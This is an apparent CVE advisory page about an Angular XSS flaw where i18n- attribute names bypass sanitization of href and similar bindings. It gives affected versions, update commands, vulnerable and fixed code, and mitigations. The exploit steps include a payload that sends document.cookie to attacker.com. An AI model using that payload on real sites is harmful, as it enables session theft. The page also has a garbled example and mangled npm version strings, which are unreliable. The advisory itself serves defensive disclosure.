Angular XSS Vulnerability, CVE-2026-32635 (High)

Listen to this Post

A Cross-Site Scripting (XSS) vulnerability exists in the Angular runtime and compiler when an application uses a security-sensitive attribute (like href) together with Angular’s internationalization (i18n) feature. Adding an `i18n-` name to an element bypasses Angular’s built-in sanitization mechanism. When combined with a data binding to untrusted user input, this allows an attacker to inject malicious scripts. The vulnerability affects attributes including action, background, cite, codebase, data, formaction, href, itemtype, longdesc, poster, src, and xlink:href . For example, `Click me` becomes exploitable. When successfully exploited, attackers can execute arbitrary code in the application’s domain, leading to session hijacking, data exfiltration, and unauthorized user actions .

dailycve form:

Platform: Angular
Version: <22.0.0-next.3, <21.2.4, <20.3.18, <19.2.20
Vulnerability :XSS i18n bypass
Severity: High (CVSS:4.0 8.6)
date: 2026-03-13

Prediction: Patched versions already available

What Undercode Say:

Analytics

The vulnerability impacts all Angular applications using i18n attribute bindings with unsanitized user input. Attackers can exploit this remotely (AV:N) with low attack complexity (AC:L) and no privileges required (PR:N), though user interaction is needed (UI:P) . Successful exploitation yields high confidentiality and integrity impact (VC:H/VI:H) .

Bash Commands

Check Angular version in your project
grep '"@angular/core"' package.json
Update to patched version
npm install @angular/[email protected] --save
Or for specific major versions
npm install @angular/[email protected] --save
npm install @angular/[email protected] --save
npm install @angular/[email protected] --save
Verify update
npm list @angular/core

Code Examples (Vulnerable vs Fixed)

Vulnerable Code:

@Component({
template: `<a href="{{userProvidedUrl}}" i18n-href>Link</a>`
})
export class AppComponent {
userProvidedUrl = 'javascript:alert("XSS")';
}

Fixed Code using DomSanitizer :

import {Component, inject} from '@angular/core';
import {DomSanitizer, SecurityContext} from '@angular/platform-browser';
@Component({
template: `<a href="{{safeUrl}}" i18n-href>Safe Link</a>`
})
export class AppComponent {
private sanitizer = inject(DomSanitizer);
safeUrl: string;
constructor() {
const dangerousUrl = 'javascript:alert("XSS")';
this.safeUrl = this.sanitizer.sanitize(SecurityContext.URL, dangerousUrl) || '';
}
}

How Exploit

  1. Attacker identifies an Angular app with i18n attribute binding

2. Finds element using vulnerable attribute with `i18n-`

3. Injects malicious payload through user-controllable input

  1. Payload bypasses sanitization due to i18n attribute presence
  2. Example malicious URL: `javascript:document.location=’http://attacker.com/?cookie=’+document.cookie`

Protection from this CVE

  1. Update Angular to patched versions: 22.0.0-next.3, 21.2.4, 20.3.18, or 19.2.20
  2. Use DomSanitizer to sanitize any user input bound to vulnerable attributes
  3. Never trust user input bound to security-sensitive attributes with i18n
  4. Implement Content Security Policy (CSP) to restrict script execution
  5. Enable Trusted Types to enforce proper HTML sanitization
  6. Audit code for `i18n-` attributes on elements with dynamic bindings

Impact

  • Session Hijacking: Stealing session cookies and authentication tokens
  • Data Exfiltration: Capturing sensitive user data from the page
  • Unauthorized Actions: Performing actions on behalf of the user
  • Page Vandalism: Mutating page content to mislead users
  • Credential Theft: Accessing LocalStorage, IndexedDB, or cookies

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top